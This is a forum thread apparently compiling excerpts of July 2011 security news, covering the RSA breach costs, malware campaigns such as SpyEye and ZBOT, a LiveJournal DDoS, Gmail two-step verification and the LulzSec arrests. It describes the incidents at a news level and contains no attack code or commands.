14 total posts
Cyber attack on RSA cost EMC $66 million
In its earnings call Tuesday, EMC disclosed that it spent $66 million in its second quarter to deal with a cyber attack that compromised its RSA Security division.
"We incurred an accrued cost associated with investigating the attack, hardening our systems and working with customers to implement our remediation programs," said EMC's executive vice president David Goluden.
EMC spent the $66 million on transaction monitoring for its corporate customers who worried that their RSA security tokens — long considered the gold-standard for protecting sensitive data — had been compromised in the attack. EMC also offered replacements to any company that requested them.
EMC also revealed some more information about the attack itself, saying that it alerted customers within hours of the intrusion and suspects that the company was targeted for information on its defense and government agencies, not for financial information.
Continued : http://www.washingtonpost.com/blogs/post-tech/post/cyber-attack-on-rsa-cost-emc-66-million/2011/07/26/gIQA1ceKbI_blog.html
Related: What did the RSA breach end up costing EMC?
Amazon S3 exploiting through SpyEye
From Kaspersky Lab Weblog:
Cloud Computing providers offer gigabytes of storage for free, and the cybercriminals use to maintain and spread malware of all the kind. At the same time, many legitimate services are not free, but are still very attractive to cybercrime gangs. In the case of Amazon, Amazon Simple Storage Service (Amazon S3) does the trick.
Despite being a paid service, the cost is not an obstacle for profitable attackers. In fact, my colleague Dmitry Bestuzhev recently told us about the spread of malware exploiting this service to "the cloud".
The truth is that these cases are not isolated. According to our research, cybercriminals have been running SpyEye activities and from Amazon for the past couple of weeks. [Screenshot]
One hurdle for these cybercriminals to abusing Amazon S3 is the creation of an Amazon Web Services (AWS) account. These accounts require a legitimate identity and method of payment, so it is evident that criminals are using stolen data to overcome this challenge.
Data shows that Amazon cloud services were abused heavily this month to spread malware. The following graph shows the domains used for this campaign from the second half of July 2011:
Continued : http://www.securelist.com/en/blog/208193064/Amazon_S3_exploiting_through_SpyEye
Trojan Tricks Victims Into Transfering Funds
It's horrifying enough when a computer crook breaks into your PC, steals your passwords and empties your bank account. Now, a new malware variant uses a devilish scheme to trick people into voluntarily transferring money from their accounts to a cyber thief's account.
The German Federal Criminal Police (the "Bundeskriminalamt" or BKA for short) recently warned consumers about a new Windows malware strain that waits until the victim logs in to his bank account. The malware then presents the customer with a message stating that a credit has been made to his account by mistake, and that the account has been frozen until the errant payment is transferred back.
When the unwitting user views his account balance, the malware modifies the amounts displayed in his browser; it appears that he has recently received a large transfer into his account. The victim is told to immediately make a transfer to return the funds and unlock his account. The malicious software presents an already filled-in online transfer form - with the account and routing numbers for a bank account the attacker controls.
The BKA's advisory isn't specific about the responsible strain of malware, but it is becoming increasingly common for banking Trojans to incorporate "Web injects," custom designed plug-ins that manipulate what victims see in their Web browsers.
Continued : http://krebsonsecurity.com/2011/07/trojan-tricks-victims-into-transfering-funds/#more-10881
Security shortcomings in both ICQ instant messenger for Windows and the ICQ website create a possible mechanism for account hijacking, a security researcher warns.
The technique might be used to steal session cookies, enabling the hijacker to impersonate victims, or (with greater difficulty) to gain access to local files on a compromised PC. Kayan found a similar cross-site scripting flaw involving Skype earlier this month.
Heise Security was able to reproduce the flaw discovered by Kayan using the current 7.5 version of ICQ. ICQ told the security news site that it was in the process of developing and testing a security fix.
Automated stock trading poses fraud risk, researcher says
An emphasis on speed and a lack of security makes automated trading in financial markets ripe for exploitation and fraud, a security researcher warned today.
Most stock trades in the U.S. and many around the world in general are now made by data-crunching computers that buy and sell stocks in microseconds--something that used to take human traders minutes to do. With these algorithm-based, high-frequency trades a fraction of second can be worth millions of dollars for an investor. (See CBS 60 Minutes report on this.)
In the push for greater speed and thus higher profits, security is sacrificed, James Arlen, principal at Push the Stack Consulting, told CNET in a preview of a presentation he will give at the Black Hat security conference in Las Vegas next week titled "Security When Nano Seconds Count."
Continued : http://news.cnet.com/8301-27080_3-20084531-245/automated-stock-trading-poses-fraud-risk-researcher-says/
Stolen USB stick contained police investigation details
Greater Manchester Police have warned that sensitive information about an ongoing criminal investigation was contained on a USB memory stick stolen from an officer's home in Oldham, UK.
The officer has been suspended, pending an investigation, and the matter has been referred to the Independent Police Complaints Commission and the Information Commissioner.
One big question which has to be answered is - was the personal data contained on the USB stick encrypted?
According to the BBC News report, it may not have been password-protected suggesting that encryption was not being used.
Aside from the issue of whether such sensitive data about an investigation should be left at an officer's home in the first place, why isn't encryption being used as a matter of course to ensure that - even if the information does fall into the wrong hands - it can't be deciphered?
Continued : http://nakedsecurity.sophos.com/2011/07/28/stolen-usb-stick-contained-police-investigation-details/
Also: Greater Manchester Police Sensitive Information Stolen on USB Stick
Windows XP's popularity is rootkit risk, new analysis finds
"OS more vulnerable than Vista and Windows 7"
The stubborn popularity of Windows XP is offering an easy target for the creators of rootkit malware, according to antivirus company Avast. Three quarters of all rootkits it found in a new study were on XP machines.
Forty-nine percent of Avast's considerable user base still runs Windows XP, itself an interesting statistic nearly two years after Windows 7 was launched, but it is its obvious vulnerability in the face of advanced rootkits such as TDL-3/4 (aka 'Alureon') that offers the clearest reminder of its obsolescence.
In the company's six-month study of 630,000 infections, not only were a disproportionate 74 percent of all rootkits found on XP PCs, 74 percent of these infections were connected to TDL. Overwhelmingly, this malware sits on the master boot record of a PC, which makes it hard to spot and get rid of using conventional tools once it has bypassed security.
Continued : http://news.techworld.com/security/3294191/windows-xps-popularity-is-rootkit-risk-new-analysis-finds/
XP remains fertile breeding ground for cyber infection
XP Remains Main Target of Rootkits
Google Enables Gmail Two-Factor Security in 150 Countries
Nearly six months after first introducing two-step verification for its Gmail service, Google has expanded the security feature to users outside the English-speaking world, opening it up to people in more than 150 countries.
The company said on Thursday that it has enabled the two-step verification process for users around the world in more than 40 languages. The enhanced Gmail authentication method involves users entering a username and password and then going through a short process to set up a system so that they can receive one-time verification codes via SMS from Google. Users also can use an app for their smartphones that will generate the codes for them.
"Once you enable 2-step verification, you'll see an extra page that prompts you for a code when you sign in to your account. After entering your password, Google will call you with the code, send you an SMS message or give you the choice to generate the code for yourself using a mobile application on your Android, BlackBerry or iPhone device. The choice is up to you. When you enter this code after correctly submitting your password we'll have a pretty good idea that the person signing in is actually you," the company said in its initial announcement of the process back in February.
Continued : http://threatpost.com/en_us/blogs/google-enables-gmail-two-factor-security-150-countries-072811
LiveJournal Targeted in Massive DDoS Attack
LiveJournal has experienced downtime during the past couple of days because of a massive distributed denial-of-service attack that overwhelmed the company's servers.
The outages began on Tuesday, but the company didn't release a statement until yesterday when it confirmed it was the target of an attack.
"We can now publicly disclose that we have been experiencing a large-scale DDoS attack the last two days, which has been the reason for the site issues most users have been experiencing," the company said.
"The traffic load has been immense, at many times our normal load level, and the attack is still on-going. We are in constant contact with our providers to mitigate the attack as best as possible," it added.
LiveJournal is one of the oldest blogging platforms, dating back to 1999, and has over 30 million registered accounts. The service remains hugely popular in Russia which accounts for nearly half of its audience.
Continued : http://news.softpedia.com/news/LiveJournal-Targeted-in-Massive-DDoS-Attack-213909.shtml
Also: LiveJournal groans under 'immense' DDos attack
LICAT Variant Distributed Via IRS-Related Spam
From TrendLabs Malware Blog:
We have encountered another LICAT variant that is being spread via fake IRS spam to people under specific organizations, including Trend Micro. As you may recall, LICAT is known for its use of dynamic domain generation algorithm (DGA) technique.
In the spammed message, recipients are informed of an issue regarding their tax payment. The message contains a link that supposedly leads to the recipient's tax review. Once the user clicks on the link, they will be prompted to download an executable file, which when executed installs the malware — now detected as TSPY_ZBOT.WHZ — into their system. [Screenshot]
Like any LICAT variant, TSPY_ZBOT.WHZ generates URLs using a computation based on the current date. TSPY_ZBOT.WHZ connects to the dynamically generated URLs in order to download its configuration file, which contains information on the websites it will monitor, as well as the site where it will send any stolen information. This malware also appears to concentrate on the typical ZBOT routines that involve information theft, and uses the DGA technique to evade blocking by antivirus products.
Google's indexing capabilities to identify vulnerabilities
"Use Google's indexing capabilities to identify vulnerabilities"
Next week at Black Hat, Stach & Liu researchers Francis Brown and Rob Ragan will show how the power of Google's indexing capabilities can be harnessed to identify vulnerabilities - particularly SQL injection flaws - that can be used to take over millions of websites that are at risk.
By searching for the right string of information, an attacker can find massive amounts of sensitive data and extract it with a few simple exploits.
Over the past year, Stach & Liu has built what may be the world's single largest repository of live vulnerabilities on the web - in fact, over 3,000 new vulnerable websites are added per day to this database via real-time RSS feed updates from both Google and Bing.
After a year of collecting this research, Brown and Ragan are returning to Black Hat to give the security community the defensive tools they've been asking for to help solve this problem.
Brown and Ragan will also show how Google hacking was used in several other recent, high profile attacks:
Continued : http://www.net-security.org/secworld.php?id=11362
UK Cops 'duped' into arresting wrong LulzSec suspect
The 19-year-old Scotsman fingered Wednesday as a central figure of the LulzSec hacking crew is a fall guy who was framed to take the heat off the real culprit, according to unconfirmed claims from a rival group.
"We believe MET Police got the wrong guy and it happens because of lot of disinformation floating on the web," a Thursday post on the LulzSec Exposed blog said. "LulzSec and Anonymous members are Master trolls and they are good at this."
According to the post, penned by members of a group calling itself the Web Ninjas, the real LulzSec figure known as Topiary is a 23-year-old Swede, who stole the handle from a low-level member after he ran afoul of its parent group Anonymous. The mistaken identity was part of an elaborate ruse to confuse authorities about Topiary's true identity, the speculation claims.
The post comes a day after the Metropolitan Police said a "pre-planned intelligence-led operation" led them to a residential address in the Shetland Islands, off the North Coast of Scotland. That's where they apprehended an unnamed 19-year-old man and transported him to London for questioning. Police said they also questioned a 17-year-old from Lincolnshire and searched his home.
Continued : http://www.theregister.co.uk/2011/07/28/topiary_arrest_rumor/
Also: Topiary: did police arrest the wrong man in LulzSec investigation?
Related: Scotland Yard Arrests Accused LulzSec Spokesman 'Topiary'
From Bruce Schneier @ his "Schneier on Security" Blog:
ShareMeNot is a Firefox add-on for preventing tracking from third-party buttons (like the Facebook "Like" button or the Google "+1" button) until the user actually chooses to interact with them. That is, ShareMeNot doesn't disable/remove these buttons completely. Rather, it allows them to render on the page, but prevents the cookies from being sent until the user actually clicks on them, at which point ShareMeNot releases the cookies and the user gets the desired behavior (i.e., they can Like or +1 the page).